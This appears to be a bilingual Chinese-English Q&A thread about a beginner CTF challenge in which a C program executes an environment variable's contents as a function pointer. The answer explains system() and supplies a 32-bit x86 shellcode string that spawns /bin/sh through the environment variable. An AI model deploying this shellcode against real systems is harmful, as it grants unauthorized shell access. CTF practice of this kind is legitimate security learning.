尝试在环境变量中执行值时出现分段错误
嘿,所以我试图解决初学者 ctf 事件的问题.
Hey so I was trying to solve a problem for beginners ctf event.
这是我试图运行的代码.
And this is the code that I am trying to run.
#include <stdio.h>
#include <stdlib.h>
int main(){
int (*func)();
func = getenv("MYENV");
func();
return 0;
}
我创建了一个这样的 MYENV 环境:
I created a MYENV environment like this :
导出 MYENV=ls
但是在运行代码时,它会抛出一个分段错误(核心转储).我不明白为什么.
but on running the code, it throws a segmentation fault (core dumped). I don't understand why.
func 函数基本上是调用环境变量,其值是我设置的一个简单命令.为什么会抛出错误.
The func function is basically calling the environment variable whose value is a simple command that I set. Why is it throwing an error.
我对 linux 和 shell 很陌生,所以如果这太天真了,我很抱歉.
I'm very new at linux and shell, so I'm sorry if this is too naive.
在 C 中,如果要运行系统命令,则必须使用 system 函数(或
In C, if you want to run a system command, you have to use the system function (or one of the exec functions but that's more complicated):
#include <stdio.h>
#include <stdlib.h>
int main() {
char* cmd = getenv("MYENV");
system(cmd);
return 0;
}
如果你想运行任意代码,你可以向其中注入 shell 代码:
If you're looking to run arbitrary code, you can inject shell code into it:
export MYENV=$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
您可以在此处了解更多信息.
You can learn more here.